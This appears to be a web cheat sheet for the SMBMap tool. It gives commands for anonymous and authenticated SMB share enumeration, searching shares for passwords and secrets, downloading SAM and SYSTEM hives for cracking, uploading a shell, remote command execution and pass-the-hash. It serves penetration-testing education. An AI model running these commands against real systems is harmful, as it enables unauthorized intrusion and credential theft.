Salta ai contenuti
1337skills 1337skills - Cheat Sheet

SMBMap

Overview

Sezione intitolata “Overview”

SMBMap is a handy SMB enumeration tool written in Python that allows you to enumerate samba share drives across an entire domain. Useful for SMB security testing and finding sensitive files on Windows networks.

Installation

Sezione intitolata “Installation”

Linux / macOS

Sezione intitolata “Linux / macOS”
# Via pip (recommended)
pip3 install smbmap

# Via git
git clone https://github.com/ShawnDEvans/smbmap.git
cd smbmap
pip3 install -r requirements.txt
python3 smbmap.py --help

Windows

Sezione intitolata “Windows”
# Via pip
pip install smbmap

# Or download and run directly
python smbmap.py [options]

Docker

Sezione intitolata “Docker”
docker run -it --rm smbmap/smbmap:latest smbmap.py --help

Basic Usage

Sezione intitolata “Basic Usage”

Help and Version

Sezione intitolata “Help and Version”
smbmap -h                           # Show help
smbmap --version                    # Show version

Required Parameters

Sezione intitolata “Required Parameters”
-H, --host <ip>                    # Target host or IP
-u, --username <user>              # Username (optional for null sessions)
-p, --password <pass>              # Password
-d, --domain <domain>              # Domain name

Null Session Enumeration

Sezione intitolata “Null Session Enumeration”

Enumerate Without Credentials

Sezione intitolata “Enumerate Without Credentials”
smbmap -H 192.168.1.100                                    # No auth
smbmap -H 192.168.1.100 -u '' -p ''                      # Null session with explicit empty creds
smbmap -H 192.168.1.100 -u 'anonymous'                   # Anonymous user

Check for Null Session Vulnerability

Sezione intitolata “Check for Null Session Vulnerability”
smbmap -H 192.168.1.100 2>&1 | grep -i "accessible\|readable"

Guest and Unauthenticated Access

Sezione intitolata “Guest and Unauthenticated Access”
smbmap -H 192.168.1.100 -u 'guest' -p ''                 # Guest account
smbmap -H 192.168.1.100 --no-color                       # Disable color output

Authenticated Enumeration

Sezione intitolata “Authenticated Enumeration”

Basic Authentication

Sezione intitolata “Basic Authentication”
smbmap -H 192.168.1.100 -u 'admin' -p 'password123'      # Username/password
smbmap -H 192.168.1.100 -d DOMAIN -u 'admin' -p 'pass'  # With domain

List All Shares

Sezione intitolata “List All Shares”
smbmap -H 192.168.1.100 -u 'admin' -p 'password123'      # Shows all accessible shares
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L          # List only shares (compact)

Check Specific Share

Sezione intitolata “Check Specific Share”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$'     # Enumerate C$ share
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users'  # Enumerate Users share

Share and Permission Enumeration

Sezione intitolata “Share and Permission Enumeration”

Share Enumeration Output

Sezione intitolata “Share Enumeration Output”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass'
# Output shows:
# Share name | Type | Permissions | Comment
# IPC$ | STYPE_IPC | NO ACCESS | (null)
# ADMIN$ | STYPE_DISKTREE | READ, WRITE | Remote Admin
# C$ | STYPE_DISKTREE | NO ACCESS | Default share
# Users | STYPE_DISKTREE | READ | User directory

Identify Writable Shares

Sezione intitolata “Identify Writable Shares”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' | grep WRITE

Parse Results for Analysis

Sezione intitolata “Parse Results for Analysis”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -q          # Quiet mode (minimal output)
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -v          # Verbose output

File Enumeration

Sezione intitolata “File Enumeration”

Recursive File Listing

Sezione intitolata “Recursive File Listing”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r
# Recursively list all files in Users share

List Specific Directory

Sezione intitolata “List Specific Directory”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r 'Documents'
# List Documents folder recursively

Find Files by Pattern

Sezione intitolata “Find Files by Pattern”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r | grep -i '.txt\|.pdf\|.xls'

File Download and Upload

Sezione intitolata “File Download and Upload”

Download Files

Sezione intitolata “Download Files”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -D 'Documents/file.txt'
# Download file to current directory

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -D 'Windows/System32/config/sam'
# Download SAM file (requires admin)

Download Entire Directory

Sezione intitolata “Download Entire Directory”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r | xargs -I {} \
  smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -D '{}'

Upload Files

Sezione intitolata “Upload Files”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -U 'shell.exe'
# Upload shell.exe to root of Users share

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -U 'shell.exe' -T 'Temp/'
# Upload to specific directory

File Content Search

Sezione intitolata “File Content Search”

Search for Keywords in Files

Sezione intitolata “Search for Keywords in Files”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r -A 'password\|secret\|api'
# Search recursively for sensitive keywords

Search Specific File Extensions

Sezione intitolata “Search Specific File Extensions”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r -A 'password' -F '*.txt\|*.conf'

Output Search Results

Sezione intitolata “Output Search Results”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'Users' -r -A 'password' -o 'results.txt'

Remote Command Execution

Sezione intitolata “Remote Command Execution”

Execute Commands (Requires Admin)

Sezione intitolata “Execute Commands (Requires Admin)”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'ipconfig'
# Execute ipconfig command

smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'whoami'
# Check current user context

Execute with Specific Share

Sezione intitolata “Execute with Specific Share”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -x 'cmd.exe /c whoami'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'ADMIN$' -x 'powershell.exe'

Execute Multiple Commands

Sezione intitolata “Execute Multiple Commands”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -x 'whoami && hostname && systeminfo'

Pass-the-Hash Attacks

Sezione intitolata “Pass-the-Hash Attacks”

Using NTLM Hash

Sezione intitolata “Using NTLM Hash”
smbmap -H 192.168.1.100 -u 'admin' -p '8846f7eaee8fb117ad06bdd830b7586c:8846f7eaee8fb117ad06bdd830b7586c'
# Format: LM:NT hash (can be same if only NT available)

PTH with Domain

Sezione intitolata “PTH with Domain”
smbmap -H 192.168.1.100 -d DOMAIN -u 'admin' -p 'hash:hash'

Combine with Command Execution

Sezione intitolata “Combine with Command Execution”
smbmap -H 192.168.1.100 -u 'admin' -p 'hash:hash' -x 'whoami'

Domain Enumeration

Sezione intitolata “Domain Enumeration”

Scan Network Range

Sezione intitolata “Scan Network Range”
for ip in 192.168.1.{1..254}; do
  timeout 2 smbmap -H $ip -u 'guest' -p '' 2>/dev/null | grep -i accessible && echo "Found: $ip"
done

Enumerate All Domain Machines

Sezione intitolata “Enumerate All Domain Machines”
smbmap -H 192.168.1.1 -u 'admin' -p 'pass' -L | grep -i 'STYPE_DISKTREE' | awk '{print $1}'

Find Printers and Shared Resources

Sezione intitolata “Find Printers and Shared Resources”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' | grep -E 'print\|share\|backup'

Common Flags Reference

Sezione intitolata “Common Flags Reference”
FlagDescription
-H, --hostTarget host IP or hostname
-u, --usernameUsername for authentication
-p, --passwordPassword for authentication
-d, --domainDomain name (for domain users)
-LList shares only (no file enumeration)
-s, --shareSpecify a single share to enumerate
-rRecursively list directory contents
-A, --searchSearch for string in files
-F, --filterFilter files by extension
-D, --downloadDownload a file
-U, --uploadUpload a file
-x, --executeExecute a command (RCE)
-o, --outfileOutput results to file
-q, --quietQuiet mode
-v, --verboseVerbose output
--no-colorDisable colored output

Integration with Other Tools

Sezione intitolata “Integration with Other Tools”

CrackMapExec Integration

Sezione intitolata “CrackMapExec Integration”
# SMBMap can be chained with CrackMapExec for comprehensive testing
cme smb 192.168.1.0/24 -u admin -p password --shares
# Then use smbmap for deeper enumeration

crackmapexec smb 192.168.1.100 -u admin -p pass -x 'whoami'  # For execution

NetExec (CrackMapExec Successor)

Sezione intitolata “NetExec (CrackMapExec Successor)”
nxc smb 192.168.1.100 -u admin -p pass --shares
# Modern alternative to CrackMapExec

Combine with Enum4linux

Sezione intitolata “Combine with Enum4linux”
enum4linux 192.168.1.100                    # Get user/group info
smbmap -H 192.168.1.100 -u 'user' -p 'pass' # Then enumerate shares

Export to Tools like BloodHound

Sezione intitolata “Export to Tools like BloodHound”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -q > shares.txt
# Parse and import share access info into BloodHound for AD analysis

Advanced Techniques

Sezione intitolata “Advanced Techniques”

Enumerate Hidden Shares

Sezione intitolata “Enumerate Hidden Shares”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L
# Will show hidden shares ending with $

Find Domain Admin Shares

Sezione intitolata “Find Domain Admin Shares”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -L | grep -i 'admin\|domain\|netlogon\|sysvol'

Backup File Discovery

Sezione intitolata “Backup File Discovery”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -r -A 'backup\|\.bak\|\.sql\|\.db' -F '.*\.(bak|sql|db|backup)$'
Sezione intitolata “Configuration File Search”
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -r -A 'password\|api\|secret' -F '.*\.(conf|config|ini|xml|json)$'

Privilege Escalation Path Finding

Sezione intitolata “Privilege Escalation Path Finding”
# Download SYSTEM and SAM files for offline cracking
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -D 'Windows/System32/config/SYSTEM'
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -D 'Windows/System32/config/SAM'

Troubleshooting

Sezione intitolata “Troubleshooting”

Connection Refused

Sezione intitolata “Connection Refused”
# Ensure SMB port 445 is open
nmap -p 445 192.168.1.100

# Try with SMB version specification
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' --smbv2

Authentication Failed

Sezione intitolata “Authentication Failed”
# Verify credentials and domain
smbmap -H 192.168.1.100 -d DOMAIN.COM -u 'DOMAIN\admin' -p 'password'

# Check for account lockout
smbmap -H 192.168.1.100 -u 'admin' -p 'wrongpass' -v

Command Execution Not Working

Sezione intitolata “Command Execution Not Working”
# Requires appropriate share access (usually C$ or ADMIN$)
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -s 'C$' -x 'whoami'

# May need elevated privileges
smbmap -H 192.168.1.100 -u 'domain\admin' -p 'pass' -x 'whoami'

Timeout Issues

Sezione intitolata “Timeout Issues”
# Increase timeout for slow networks
smbmap -H 192.168.1.100 -u 'admin' -p 'pass' -v
# Add verbose flag to see timeout errors

Security Notes

Sezione intitolata “Security Notes”
  • Always obtain proper authorization before testing SMB shares
  • Null sessions may be disabled on modern systems but still worth checking
  • Pass-the-hash attacks require NTLM hash of user (not cleartext password)
  • Command execution typically requires local admin or system access
  • Monitor logs for SMBMap activity (Event ID 4625 for failed logins)
  • Use VPN/proxies appropriately for remote engagements
  • Credentials should be handled securely (use -p with caution in shell history)
Sezione intitolata “Related Tools”
  • nmap — Network scanning and SMB enumeration
  • enum4linux — Linux-based SMB enumeration
  • CrackMapExec — Comprehensive SMB exploitation framework
  • NetExec — Modern successor to CrackMapExec
  • smbclient — Command-line SMB/CIFS client
  • impacket — Python library for SMB protocol manipulation
  • Metasploit — Framework with SMB modules